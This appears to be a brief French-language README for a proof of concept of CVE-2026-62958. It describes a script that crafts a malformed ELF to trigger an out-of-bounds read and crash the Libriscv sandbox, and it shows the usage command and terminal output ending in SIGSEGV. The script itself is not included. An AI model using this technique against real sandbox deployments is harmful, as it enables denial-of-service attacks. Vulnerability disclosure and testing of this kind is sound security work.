
Preuve de concept pour CVE-2026-62958 : crée un ELF malformé pour déclencher une lecture hors limites dans Libriscv et faire planter le bac à sable avec SIGSEGV.
Une vulnérabilité dans Libriscv permet à l'attaquant de faire planter le bac à sable en utilisant une lecture hors limites.
Pour créer un mauvais elf :
python3 poc.py samplefile poisoned_file
Résultats :
❯ python3 poc.py fib poisoned_file
Manipulating .text section header at offset 0x250
Manipulating .symtab section header at offset 0x710
❯ ./rvlinux poisoned_file
fish: Job 1, './rvlinux poisoned_file' terminated by signal SIGSEGV (Address boundary error)